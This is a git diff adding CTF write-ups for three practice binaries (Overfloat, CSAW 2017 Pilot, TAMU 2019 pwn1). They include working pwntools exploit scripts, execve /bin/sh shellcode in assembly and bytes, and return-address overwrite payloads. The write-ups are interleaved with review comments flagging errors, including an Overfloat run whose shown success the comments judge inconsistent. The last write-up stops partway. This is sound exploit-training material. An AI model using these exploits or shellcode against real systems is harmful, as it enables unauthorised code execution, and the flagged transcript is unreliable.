+ -rwxr-xr-x 1 nothing nothing 14K Mar 6 19:10 overfloat
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [binexp/2/overf]
+ → python3 exploit.py
+ [+] Starting local process './overfloat': pid 2897697
+ [*] '/home/nothing/binexp/2/overf/libc-2.27.so'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+ b' _ .--. \n ( ` ) \n .-\' `--, \n _..----.. ( )`-. \n .\'_|` _|` _|( .__, )\n /_| _| _| _( (_, .-\' \n ;| _| _| _| \'-\'__,--\'`--\' \n | _| _| _| _| | \n _ || _| _| _| _| \n _( `--.\\_| _| _| _|/ \n .-\' )--,| _| _|.` \n (__, (_ ) )_| _| / \n `-.__.\\ _,--\'\\|__|__/ \n ;____; \n \\YT/ \n || \n |""| \n \'==\' \n\nWHERE WOULD YOU LIKE TO GO?\nLAT[0]: LON[0]: LAT[1]: LON[1]: LAT[2]: LON[2]: LAT[3]: LON[3]: LAT[4]: LON[4]: LAT[5]: LON[5]: LAT[6]: LON[6]: LAT[7]: LON[7]: LAT[8]: LON[8]: LAT[9]: LON[9]: LAT[0]: LON[0]: LAT[1]: BON VOYAGE!\n'
+ libc base: 0x7f4b371d8310
+ [*] Switching to interactive mode
+
+ _ .--.
+ ( ` )
+ .-' `--,
+ _..----.. ( )`-.
+ .'_|` _|` _|( .__, )
+ /_| _| _| _( (_, .-'
+ ;| _| _| _| '-'__,--'`--'
+ | _| _| _| _| |
+ _ || _| _| _| _|
+ _( `--.\_| _| _| _|/
+ .-' )--,| _| _|.`
+ (__, (_ ) )_| _| /
+ `-.__.\ _,--'\|__|__/
+ ;____;
+ \YT/
+ ||
+ |""|
+ '=='
+
+ WHERE WOULD YOU LIKE TO GO?
+ LAT[0]: LON[0]: LAT[1]: LON[1]: LAT[2]: LON[2]: LAT[3]: LON[3]: LAT[4]: LON[4]: LAT[5]: LON[5]: LAT[6]: LON[6]: LAT[7]: LON[7]: LAT[8]: BON VOYAGE!
+ [*] Got EOF while reading in interactive
+ $ cat flag
+ flag{g0ttem_b0yz}
+
+
+
+And that's it! We have been able to spawn a shell and print the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
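Review bot: the `libc base: 0x7f4b371d8310` printed by the run is not page-aligned, so `base = leak - libc.symbols['puts']` is applying `libc-2.27.so` symbol offsets to a different library: `process('./overfloat')` is started without `LD_PRELOAD` or a loader-patched binary, so the system libc is mapped, and `oneShot = 0x4f2c5` from `one_gadget libc-2.27.so` is then added to a wrong base. The second `BON VOYAGE!` followed by `[*] Got EOF while reading in interactive` is consistent with a crash at that return address rather than a shell, and the listing just above the run (`core`, `exploit.py`, `libc-2.27.so`, `overfloat`) contains no `flag` file for `cat flag` to read, so the transcript should be regenerated after starting the target with the bundled libc and its matching `ld-2.27.so`, with `assert base & 0xfff == 0` guarding the computation. The chosen gadget also carries the constraints `rsp & 0xf == 0` and `rcx == NULL`, which the text never checks; a breakpoint on the `ret` of `main` after the second `done` confirms them, and `0x4f322` (`[rsp+0x40] == NULL`) is the fallback if they fail. Two wording problems in the analysis: `It scans 100 bytes of data into local_78 thanks to the memset() function call` attributes the read to the wrong call, it is `fgets(local_78,100,stdin)` that reads up to 99 bytes while `memset` only zeroes the buffer afterwards; and `the 48 bytes for the space, of our local_48 variable` should refer to `local_38`, the 48-byte buffer at `Stack[-0x38]` (`0x38` minus 8 for the saved `rbp`), whose 56-byte distance to the return address is exactly what the seven `sendVal(0xdeadbeefdeadbeef)` calls (7 × 8 bytes, two floats each) fill.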
diff --git a/2/pilot.md b/2/pilot.md
new file mode 100644
index 0000000..2ddf075
--- /dev/null
+++ b/2/pilot.md
@@ -0,0 +1,513 @@
+# CSAW 2017 Pilot
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/csaw17_pilot/pilot
+ --2021-03-01 14:32:43-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/06-bof_shellcode/csaw17_pilot/pilot
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/csaw17_pilot/pilot [following]
+ --2021-03-01 14:32:44-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/06-bof_shellcode/csaw17_pilot/pilot
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 10472 (10K) [application/octet-stream]
+ Saving to: ‘pilot’
+
+ pilot 100%[=================================================================>] 10.23K --.-KB/s in 0.002s
+
+ 2021-03-01 14:32:44 (5.39 MB/s) - ‘pilot’ saved [10472/10472]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → file pilot
+ pilot: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6ed26a43b94fd3ff1dd15964e4106df72c01dc6c, stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → chmod +x pilot
+
+
+
+` ![]()
+
+## Solution
+
+First let's run the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot
+ [*]Welcome DropShip Pilot...
+ [*]I am your assitant A.I....
+ [*]I will be guiding you through the tutorial....
+ [*]As a first step, lets learn how to land at the designated location....
+ [*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...
+ [*]Good Luck Pilot!....
+ [*]Location:0x7ffee9a9c6c0
+ [*]Command:ls
+ [*]There are no commands....
+ [*]Mission Failed....
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot
+ [*]Welcome DropShip Pilot...
+ [*]I am your assitant A.I....
+ [*]I will be guiding you through the tutorial....
+ [*]As a first step, lets learn how to land at the designated location....
+ [*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...
+ [*]Good Luck Pilot!....
+ [*]Location:0x7ffeeecbfee0
+ [*]Command:help
+
+
+
+The binary basically prints out text with an interesting 'location' memory address, then we enter a command and either it gives us 'mission failed' or it might give us something else. Let's inspect it in ghidra:
+
+
+
+Now unlike the previous challenges, the main function called isn't called 'main' instead it is called 'FUN_004009a6'. Now let's inspect the parts of the code that are interesting:
+
+
+ sVar2 = read(0,local_28,0x40);
+
+
+
+Now here we can see that it scans 0x40 bytes worth of input into the local_28 variable and this variable can only hold 32 bytes worth of input, so this is a buffer overflow vulnerability. The address that is being printed is an infoleak for the start of our input in memory on the stack:
+
+
+
+Now that we know that our local input variable is local_28 let's look at the stack layout in ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined FUN_004009a6()
+ undefined AL:1 <****RETURN>
+ undefined1 Stack[-0x28]:1 local_28 XREF[2]: 00400aa4(*),
+ 00400acf(*)
+ FUN_004009a6 XREF[4]: entry:004008cd(*),
+ entry:004008cd(*), 00400de0,
+ 00400e80(*)
+ 004009a6 55 PUSH RBP
+
+Here we don't see anything between the start of our input and the return address, so this means that we should be able to use the overflow vulnerability to overwrite the return address to get code execution. so let's inspect that from gdb, we will set a breakpoint right after the read call, and look at the memory there:
+
+
+ 00400ae0 e8 3b fd CALL read ssize_t read(int __fd, void * __
+ ff ff
+ 00400ae5 48 83 f8 04 CMP RAX,0x4
+
+
+
+The breakpoint will be at 0x00400ae5 because it's right after the read call:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/54 ] [binexp/2/pilot]
+ → gdb ./pilot
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./pilot...
+ (No debugging symbols found in ./pilot)
+ gef➤ b *0x400ae5
+ Breakpoint 1 at 0x400ae5
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/pilot/pilot
+ [*]Welcome DropShip Pilot...
+ [*]I am your assitant A.I....
+ [*]I will be guiding you through the tutorial....
+ [*]As a first step, lets learn how to land at the designated location....
+ [*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...
+ [*]Good Luck Pilot!....
+ [*]Location:0x7fffffffdf30
+ [*]Command:13371337
+
+ Breakpoint 1, 0x0000000000400ae5 in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x9
+ $rbx : 0x0000000000400b90 → push r15
+ $rcx : 0x00007ffff7ce0052 → 0x5677fffff0003d48 ("H="?)
+ $rdx : 0x40
+ $rsp : 0x00007fffffffdf30 → 0x3733333137333331 ("13371337"?)
+ $rbp : 0x00007fffffffdf50 → 0x0000000000000000
+ $rsi : 0x00007fffffffdf30 → 0x3733333137333331 ("13371337"?)
+ $rdi : 0x0
+ $rip : 0x0000000000400ae5 → cmp rax, 0x4
+ $r8 : 0xb
+ $r9 : 0x00007fffffffdd00 → 0x0000000000000000
+ $r10 : 0xfffffffffffff61c
+ $r11 : 0x246
+ $r12 : 0x00000000004008b0 → xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffdf30│+0x0000: 0x3733333137333331 ← $rsp, $rsi
+ 0x00007fffffffdf38│+0x0008: 0x000000000040080a → add cl, ch
+ 0x00007fffffffdf40│+0x0010: 0x00007fffffffe040 → 0x0000000000000001
+ 0x00007fffffffdf48│+0x0018: 0x0000000000000000
+ 0x00007fffffffdf50│+0x0020: 0x0000000000000000 ← $rbp
+ 0x00007fffffffdf58│+0x0028: 0x00007ffff7c17b25 → <__libc_start_main+213> mov edi, eax
+ 0x00007fffffffdf60│+0x0030: 0x00007fffffffe048 → 0x00007fffffffe362 → "/home/nothing/binexp/2/pilot/pilot"
+ 0x00007fffffffdf68│+0x0038: 0x00000001000011bf
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400ad8 mov rsi, rax
+ 0x400adb mov edi, 0x0
+ 0x400ae0 call 0x400820
+ ●→ 0x400ae5 cmp rax, 0x4
+ 0x400ae9 setle al
+ 0x400aec test al, al
+ 0x400aee je 0x400b2f
+ 0x400af0 mov esi, 0x400d90
+ 0x400af5 mov edi, 0x6020a0
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "pilot", stopped 0x400ae5 in ?? (), reason: BREAKPOINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x400ae5 → cmp rax, 0x4
+ [#1] 0x7ffff7c17b25 → __libc_start_main()
+ [#2] 0x4008d9 → hlt
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+So now we set the breakpoint where we wanted, then ran the binary, put in a simple pattern '13371337' and then we hit our breakpoint. Now let's search for our pattern in memory as well as the address of the return address:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rwx
+ 0x7fffffffdf30 - 0x7fffffffdf38 → "13371337[...]"
+
+ gef➤ i f
+ Stack level 0, frame at 0x7fffffffdf60:
+ rip = 0x400ae5; saved rip = 0x7ffff7c17b25
+ called by frame at 0x7fffffffe030
+ Arglist at 0x7fffffffdf28, args:
+ Locals at 0x7fffffffdf28, Previous frame's sp is 0x7fffffffdf60
+ Saved registers:
+ rbp at 0x7fffffffdf50, rip at 0x7fffffffdf58
+
+
+Now we see that our pattern is located at 0x7fffffffdf30, and the return address is at 0x7fffffffdf58 so let's calculate the offset in python3:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffdf30 - 0x7fffffffdf58 )
+ '-0x28'
+
+
+
+And here we see that we have a 0x28 bytes offset. So our goal here is to create a payload that will first fill the 0x28 offset with nullbytes (\x00) and then we will be able to overwrite the return address, however we must keep in mind that the Location of the pattern changes each time, so we need a way to get it no matter how it changes:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot | grep Location
+ [*]Location:0x7ffdc6df25c0
+ ^C
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot | grep Location
+ [*]Location:0x7ffca4cfcef0
+ ^C
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot | grep Location
+ [*]Location:0x7ffdaad8fc90
+ ^C
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → ./pilot | grep Location
+ [*]Location:0x7ffed0e90200
+
+
+
+So let's begin to write our python3 exploit:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/pilot]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./pilot')
+
+
+ #print the output text until the 'Location:' part
+ print(target.recvuntil("[*]Location:"))
+
+ #right after the 'Location:' part, is the memory address of our input
+ leak = target.recvline()
+
+ inputAdr = int(leak.strip(b"\n"), 16)
+
+ #store the memory address until the newline character (16 characters)
+
+ print(inputAdr)
+
+ payload = ""
+
+
+
+
+Now here we have the variable called 'inputAddr' that is the memory address of our input. Now we need to put in shellcode in the payload, the first 2 writeups of this challenge that i found werent explaining the source of the shellcode that was found, but thankfully there was a writeup that explained it [here](https://0xdeadbeefjerky.com/2017/09/23/csaw-ctf-pilot-writeup.html):
+
+_" We know that the target is a 64-bit Linux (ELF) binary (as per the ‘file’ output), so why not provide shellcode that executes /bin/sh and drop us into a shell on the host running ‘pilot’? NYU’s Offensive Security, Incident Response and Internet Security Laboratory (OSIRIS Lab) was kind enough to open source an entire repository of shellcode written by NYU students. Browsing through this repository, we come across a directory containing shellcode designed to achieve our goal - 64-bit local /bin/sh. [...] This will be our shellcode that executes /bin/sh to drop us into a shell on the target system."_
+
+So we could clone the repository locally and generate the shellcode ourselves aswell, but we can also pick a 64bit /bin/sh shellcode from [shell-storm.org](http://shell-storm.org/shellcode/) and just copy paste it. Or we could also contruct our own shellcode instead, this is better because that way we know what the source assembly code is, and we compile the shellcode ourselves::
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/55 ] [binexp/2/pilot]
+ → vim 7.asm
+
+
+
+
+ section .text
+ global _start
+
+ _start:
+
+ xor esi, esi ; xor out esi and edx
+ xor edx, edx
+
+ push 0x3b ;push the value of the syscall id onto the stack (0x3b is 59)
+ pop rax ;take the out the top of the stack to put it into rax
+
+ mov rbx, 0x68732f2f6e69622f ; put the little endian hex val of '/bin//sh' into rbx
+
+ push rsi
+ push rbx
+ mov rdi, rsp
+ syscall
+
+
+
+Now let's compile it and test it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → nasm -f elf64 7.asm
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → ld 7.o -o 7
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → ./7
+
+ [ 192.168.100.1/24 ] [ /dev/pts/7 ] [/home/nothing/binexp/2/pilot]
+ → echo $0
+ bash
+
+ [ 192.168.100.1/24 ] [ /dev/pts/7 ] [/home/nothing/binexp/2/pilot]
+ → exit
+ exit
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → echo $0
+ /bin/zsh
+
+
+
+And we see that it enables us to switch from zsh to bash! now let's make shellcode out of it after we adjust the assembly file:
+
+
+ [bits 64]
+
+ xor esi, esi ; xor out esi and edx
+ xor edx, edx
+
+ push 0x3b ;push the value of the syscall id onto the stack (0x3b is 59)
+ pop rax ;take the out the top of the stack to put it into rax
+
+ mov rbx, 0x68732f2f6e69622f ; put the little endian hex val of '/bin//sh' into rbx
+
+ push rsi ; push the value of rsi
+ push rbx ; push the value of rbx
+ mov rdi, rsp ; move the value of rsp ( ) into rdi (first arguement)
+ syscall
+
+
+
+Now let's compile it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → nasm -f bin 7.asm -o shellcode
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → cat shellcode
+ 11j;XH/bin//shVSH%
+
+
+
+Now let's view it inside of python exploit script:
+
+
+ from pwn import *
+
+
+ #read the shellcode file we compiled
+ with open('shellcode', 'rb') as f:
+ shellcode = f.read()
+
+ #initialize the payload
+ payload = b""
+
+ payload += shellcode
+
+ print(payload)
+ print(hexdump(payload))
+
+
+
+
+Now let's test our script:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → python3 exploit.py
+ b'1\xf61\xd2j;XH\xbb/bin//shVSH\x89\xe7\x0f\x05'
+ 00000000 31 f6 31 d2 6a 3b 58 48 bb 2f 62 69 6e 2f 2f 73 │1·1·│j;XH│·/bi│n//s│
+ 00000010 68 56 53 48 89 e7 0f 05 │hVSH│····│
+ 00000018
+
+
+
+Now let's make the full payload and view the hexdump of it:
+
+
+ from pwn import *
+
+
+ target = process('./pilot')
+
+
+ #print the output text until the 'Location:' part
+ print(target.recvuntil("[*]Location:"))
+
+ #right after the 'Location:' part, is the memory address of our input
+ leak = target.recvline()
+ inputAdr = int(leak.strip(b"\n"), 16)
+
+ #store the memory address until the newline character (16 characters)
+ print(inputAdr)
+
+
+
+ with open('shellcode', 'rb') as f:
+ shellcode = f.read()
+
+ #initialize the payload
+ payload = b""
+
+ #add the shellcode to the payload this is 21 bytes long or 0x15 in hexa
+ payload += shellcode
+
+ #add the remaining required padding to the payload so that it attains the 0x28 size (thanks to added nullbytes)
+ payload += b"\x00" * (0x28 - len(payload))
+
+ #overwrite the return address with the address of the start of our input
+ payload += p64(inputAdr)
+
+ print(payload)
+ print(hexdump(payload))
+
+
+
+The plan here is to first push shellcode onto the stack, and we know where it is thanks to the memory address that's given to us, then we fill the gap with nullbytes, and then overwrite the return address to point to the start of our shellcode
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → python3 exploit.py
+ [+] Starting local process './pilot': pid 2235412
+ b'[*]Welcome DropShip Pilot...\n[*]I am your assitant A.I....\n[*]I will be guiding you through the tutorial....\n[*]As a first step, lets learn how to land at the designated location....\n[*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...\n[*]Good Luck Pilot!....\n[*]Location:'
+ 140732702676240
+ b'1\xf61\xd2j;XH\xbb/bin//shVSH\x89\xe7\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10U\xc0\xe2\xfe\x7f\x00\x00'
+ 00000000 31 f6 31 d2 6a 3b 58 48 bb 2f 62 69 6e 2f 2f 73 │1·1·│j;XH│·/bi│n//s│
+ 00000010 68 56 53 48 89 e7 0f 05 00 00 00 00 00 00 00 00 │hVSH│····│····│····│
+ 00000020 00 00 00 00 00 00 00 00 10 55 c0 e2 fe 7f 00 00 │····│····│·U··│····│
+ 00000030
+
+
+
+Now that we have our payload, we send the payload to the binary file with the following last 2 lines :
+
+
+
+ target.send(payload)
+ target.interactive()
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/7 ] [binexp/2/pilot]
+ → python3 exploit.py
+ [+] Starting local process './pilot': pid 2248247
+ b'[*]Welcome DropShip Pilot...\n[*]I am your assitant A.I....\n[*]I will be guiding you through the tutorial....\n[*]As a first step, lets learn how to land at the designated location....\n[*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...\n[*]Good Luck Pilot!....\n[*]Location:'
+ 140730313557488
+ b'1\xf61\xd2j;XH\xbb/bin//shVSH\x89\xe7\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0EYT\xfe\x7f\x00\x00'
+ 00000000 31 f6 31 d2 6a 3b 58 48 bb 2f 62 69 6e 2f 2f 73 │1·1·│j;XH│·/bi│n//s│
+ 00000010 68 56 53 48 89 e7 0f 05 00 00 00 00 00 00 00 00 │hVSH│····│····│····│
+ 00000020 00 00 00 00 00 00 00 00 f0 45 59 54 fe 7f 00 00 │····│····│·EYT│····│
+ 00000030
+ [*] Switching to interactive mode
+ [*]Command:$ cat flag.txt
+ flag{g0ttem_b0yz}
+ $ exit
+ [*] Got EOF while reading in interactive
+ $ exit
+ [*] Process './pilot' stopped with exit code 0 (pid 2248247)
+ [*] Got EOF while sending in interactive
+
+
+
+And that's it! we have been able to spawn a shell and print out the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
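Review bot: the comment on the shellcode line of the final exploit.py listing, `#add the shellcode to the payload this is 21 bytes long or 0x15 in hexa`, contradicts the hexdump printed just above it, which ends at offset `00000018`: the compiled shellcode is 24 (0x18) bytes, so either correct the count or drop it, since the padding is computed from `len(payload)` anyway. Two smaller points in the same file: the first exploit.py draft initialises `payload = ""` (a str) while every later listing uses `b""`, and the comment about storing the memory address up to the newline sits after the assignment it describes, just above `print(inputAdr)`; move it up next to the `leak = target.recvline()` line. In the prose, the sentence "Here we don't see anything between the start of our input and the return address" is at odds with the `i f` output (`rbp at 0x7fffffffdf50, rip at 0x7fffffffdf58`): the saved rbp lies between the 0x20-byte buffer and the saved rip, which is exactly why the computed offset is 0x28 rather than 0x20, and that deserves a sentence. Finally the trailing `## Title` / `text` sections at the end of the file are unfilled template stubs with a stray backtick before the empty image link; remove them or fill them in before merging.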
diff --git a/2/pwn1.md b/2/pwn1.md
new file mode 100644
index 0000000..3a53238
--- /dev/null
+++ b/2/pwn1.md
@@ -0,0 +1,320 @@
+# TAMU 2019 pwn1
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/tamu19_pwn1/pwn1
+ --2021-02-23 13:16:19-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/tamu19_pwn1/pwn1
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/tamu19_pwn1/pwn1 [following]
+ --2021-02-23 13:16:20-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/tamu19_pwn1/pwn1
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7536 (7.4K) [application/octet-stream]
+ Saving to: ‘pwn1’
+
+ pwn1 100%[=======================================================================================================================================================================================================>] 7.36K --.-KB/s in 0.003s
+
+ 2021-02-23 13:16:20 (2.58 MB/s) - ‘pwn1’ saved [7536/7536]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → file pwn1
+ pwn1: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d126d8e3812dd7aa1accb16feac888c99841f504, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → chmod +x pwn1
+
+
+` ![]()
+
+## Solution
+
+First step, let's run the binary to see what it does:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → ./pwn1
+ Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
+ What... is your name?
+ nothing
+ I don't know that! Auuuuuuuugh!
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → ./pwn1
+ Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
+ What... is your name?
+ nobody
+ I don't know that! Auuuuuuuugh!
+
+
+similar to the previous 2 challenges, it prompts us for some text, and we need to put in something specific, so let's inspect the binary from ghidra:
+
+
+
+
+ /* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
+
+ undefined4 main(void)
+
+ {
+ int iVar1;
+ char local_43 [43];
+ int local_18;
+ undefined4 local_14;
+ undefined *local_10;
+
+ local_10 = &stack0x00000004;
+ setvbuf(stdout,(char *)0x2,0,0);
+ local_14 = 2;
+ local_18 = 0;
+ puts(
+ "Stop! Who would cross the Bridge of Death must answer me these questions three, ere theother side he see."
+ );
+ puts("What... is your name?");
+ fgets(local_43,0x2b,stdin);
+ iVar1 = strcmp(local_43,"Sir Lancelot of Camelot\n");
+ if (iVar1 != 0) {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ puts("What... is your quest?");
+ fgets(local_43,0x2b,stdin);
+ iVar1 = strcmp(local_43,"To seek the Holy Grail.\n");
+ if (iVar1 != 0) {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ puts("What... is my secret?");
+ gets(local_43);
+ if (local_18 == -0x215eef38) {
+ print_flag();
+ }
+ else {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ }
+ return 0;
+ }
+
+
+looking at the disassembly code, we see a few interesting things. First of all our input text is stored in the variable 'local_43' and then it gets compared to the string of text 'Sir Lancelot of Camelot', depending on that it will either exit with the text 'i don't know that!' or proceed. so let's continue:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/pwn1]
+ → ./pwn1
+ Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
+ What... is your name?
+ Sir Lancelot of Camelot
+ What... is your quest?
+ To seek the Holy Grail.
+ What... is my secret?
+ something secret
+ I don't know that! Auuuuuuuugh!
+
+
+Likewise, we also see that we need to input the seek the holy grail quest text, but then we do not know the secret passphrase yet. So we need to investigate further:
+
+
+ puts("What... is my secret?");
+ gets(local_43);
+ if (local_18 == -0x215eef38) {
+ print_flag();
+ }
+ else {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ }
+ return 0;
+
+
+in here, our input text gets put into local_43, and then it is basically not even using our text, instead the binary file checks if local_18 is the same as -0x215eef38, so let's see what this is about:
+
+
+ int local_18;
+
+ [...]
+
+ local_18 = 0;
+
+ [...]
+
+ if (local_18 == -0x215eef38) {
+ print_flag();
+ }
+ else {
+ puts("I don\'t know that! Auuuuuuuugh!");
+ }
+
+
+apparently local_18 is supposed to be an integer being set to 0, let's get more info on this integer:
+
+
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main(undefined1 param_1)
+ undefined AL:1
+ undefined1 Stack[0x4]:1 param_1 XREF[1]: 00010779(*)
+ undefined4 Stack[0x0]:4 local_res0 XREF[1]: 00010780(R)
+ undefined1 Stack[-0x10]:1 local_10 XREF[1]: 000108d9(*)
+ undefined4 Stack[-0x14]:4 local_14 XREF[1]: 000107ad(W)
+ undefined4 Stack[-0x18]:4 local_18 XREF[2]: 000107b4(W),
+ 000108b2(R)
+ undefined1 Stack[-0x43]:1 local_43 XREF[5]: 000107ed(*),
+ 00010803(*),
+ 0001084f(*),
+ 00010865(*),
+ 000108a6(*)
+ main XREF[5]: Entry Point(*),
+ _start:000105e6(*), 00010ab8,
+ 00010b4c(*), 00011ff8(*)
+ 00010779 8d 4c 24 04 LEA ECX=>param_1,[ESP + 0x4]
+
+
+
+and let's get the information as to what our integer should be:
+
+
+
+
+ 000108b2 81 7d f0 CMP dword ptr [EBP + local_18],0xdea110c8
+ c8 10 a1 de
+
+
+
+right here we see that the if statement compares our local_18 variable to the 0xdea110c8 value, if it is equal, it will call the print_flag function, so let's check out what we have about that function:
+
+
+
+
+ /* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
+
+ void print_flag(void)
